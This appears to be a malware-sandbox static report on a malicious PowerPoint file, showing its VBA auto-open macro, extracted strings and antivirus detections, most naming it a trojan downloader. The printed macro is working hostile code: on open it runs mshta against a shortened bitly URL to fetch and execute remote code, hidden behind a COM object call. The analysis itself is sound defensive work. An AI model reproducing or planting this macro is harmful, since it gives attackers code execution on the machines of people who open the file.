Static | ZeroBOX

Original


                                        Attribute VB_Name = "Module1"
Sub AUTO_OpeN()


Dim maaakialo As String
Dim alo2 As String
Dim alo3 As String
Dim alo1 As String


alo1 = "" + ""
maaakialo = "mshta"
alo2 = " https://bitly.com/" + "ywuiqdbnas" + "qwyudasbnd"
alo3 = maaakialo & " " & alo2

Set meinkonhun = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")
meinkonhun.EXEC alo3
End Sub

                                    

Deobfuscated


                                        Attribute VB_Name = "Module1"
Sub AUTO_OpeN()


Dim maaakialo As String
Dim alo2 As String
Dim alo3 As String
Dim alo1 As String


alo1 = "" + ""
maaakialo = "mshta"
alo2 = " https://bitly.com/" + "ywuiqdbnas" + "qwyudasbnd"
alo3 = maaakialo & " " & alo2

Set meinkonhun = GetObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")
meinkonhun.EXEC alo3
End Sub

                                    
Module1
ID="{00000000-0000-0000-0000-000000000000}"
Module=Module1
HelpFile=""
Name="VBAProject"
HelpContextID="0"
VersionCompatible32="393222000"
CMG="D8DA7482788278867C867C"
DPB="86842A9E76E239FF39FFC6013AFF4C6F4D41705DC0B35964F50078FFA3AFFA60FD9C49A7B0286E"
GC="3436984CE8FBE9FBE9FB"
[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000
[Workspace]
Module1=32, 32, 1628, 721, Z
PowerPoint
Win64x
Project1
stdole
VBAProject
Office
Module1b
_Evaluate
konhunmein
AUTO_Closew
maaakialoBc
lunlayliahaitmnekehtorahahun
GetObjectz
EXECzy
_B_var_maaakialo
_B_var_lunlayliahaitmnekehtorahahun
meinkonhun
AUTO_OpeNV
_B_var_meinkonhun*
_B_var_alo2d
_B_var_alo3e
StringOne
StringTwo
StringThree1b
_B_var_alo1c
Module1
VBAProject
C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL
C:\Program Files\Microsoft Office\root\Office16\MSPPT.OLB
PowerPoint
stdole
C:\Windows\System32\stdole2.tlb
C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL
Office
AUTO_OpeN
VBE7.DLL
new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B$
https://bitly.com/
ywuiqdbnas
qwyudasbnd
Attribut
e VB_Nam
e = "Mod
ub AUTO_
OpeN()
Dim maa
akialo A
ps://bit
ly.com/
ywuiqdbn
@Set mei
nkonhun
GetObjec
t("new:F
935DC22-
1CF0-11D
0-ADB9-0
0C04FD580A0B"
roject
G{000204
0046}#2
.0#0#C:\
Windows\
System32
e2.tlb#
OLE Auto
mation
EOffic
D04C-5BF
A-101B-BHDE5
Files\C ommon
crosoft
Shared\O
FFICE16\
MSO.DLL#
M 16.0
LibrXary
Module1
Widescreen
Calibri
Calibri Light
Office Theme
Fonts Used
Slide Titles
Master Mana
Master Mana
Microsoft Office PowerPoint
Root Entry
PROJECT
PROJECTwm
1Module1
Module1
__SRP_0
__SRP_1
__SRP_2
__SRP_3
_VBA_PROJECT
SummaryInformation
*\G{000204EF-0000-0000-C000-000000000046}#4.2#9#C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\VBE7.DLL#Visual Basic For Applications
*\G{91493440-5A91-11CF-8700-00AA0060263B}#2.c#0#C:\Program Files\Microsoft Office\root\Office16\MSPPT.OLB#Microsoft PowerPoint 16.0 Object Library
*\G{00020430-0000-0000-C000-000000000046}#2.0#0#C:\Windows\System32\stdole2.tlb#OLE Automation
*\G{2DF8D04C-5BFA-101B-BDE5-00AA0044DE52}#2.8#0#C:\Program Files\Common Files\Microsoft Shared\OFFICE16\MSO.DLL#Microsoft Office 16.0 Object Library
Module1
1>62e3544f
Module1
https://bitly.com/dyhajhdjksahdkahj
new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B
https://bitly.com/
dghasgda
dhnjksahd
twyeqdbah
dbhaksghda
dhjkaydajk
wyquibxcasad
dhuaskbjka
wwqujsxcasad
ywuiqdbnas
qwyudasbnd
hta https://bitly.com/dyhajhdjksahdkahj
-11D0-ADB9-00C04FD58A0Bn
$*\Rffff*1>62e3544f
*\R0*#17
DocumentSummaryInformation
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Generic.a!c
DrWeb Clean
ClamAV Clean
CMC Clean
CAT-QuickHeal Clean
ALYac Trojan.Downloader.VBA.gen
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
BitDefenderTheta Clean
Cyren Trojan.JXEI-7
Symantec W97M.Downloader
ESET-NOD32 VBA/TrojanDownloader.Agent.WLA
TrendMicro-HouseCall TROJ_FRS.VSNTGD21
Avast Other:Malware-gen [Trj]
Cynet Malicious (score: 99)
Kaspersky HEUR:Trojan-Downloader.Script.Generic
BitDefender VB:Trojan.VBA.Agent.BKX
NANO-Antivirus Clean
SUPERAntiSpyware Clean
MicroWorld-eScan VB:Trojan.VBA.Agent.BKX
Tencent Clean
Ad-Aware VB:Trojan.VBA.Agent.BKX
Sophos Clean
Comodo Clean
F-Secure Heuristic.HEUR/Macro.Downloader.MRKI.Gen
Baidu Clean
VIPRE Clean
TrendMicro TROJ_FRS.VSNTGD21
McAfee-GW-Edition Artemis!Trojan
FireEye VB:Trojan.VBA.Agent.BKX
Emsisoft VB:Trojan.VBA.Agent.BKX (B)
SentinelOne Clean
Jiangmin Clean
Avira HEUR/Macro.Downloader.MRKI.Gen
MAX malware (ai score=99)
Antiy-AVL Clean
Kingsoft Clean
Microsoft Trojan:O97M/Obfuse.BPK!MTB
Gridinsoft Clean
Arcabit Clean
ViRobot Clean
GData Generic.Trojan.Agent.UO8XW1
AhnLab-V3 Clean
Acronis Clean
McAfee RDN/Generic Downloader.x
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Downloader.Mshta/VBA!1.D6DF (CLASSIC)
Yandex Clean
Ikarus Trojan-Downloader.VBA.Agent
MaxSecure Clean
Fortinet VBA/Valyria.MRKI!tr
AVG Other:Malware-gen [Trj]
Panda Clean
Qihoo-360 Clean
No IRMA results available.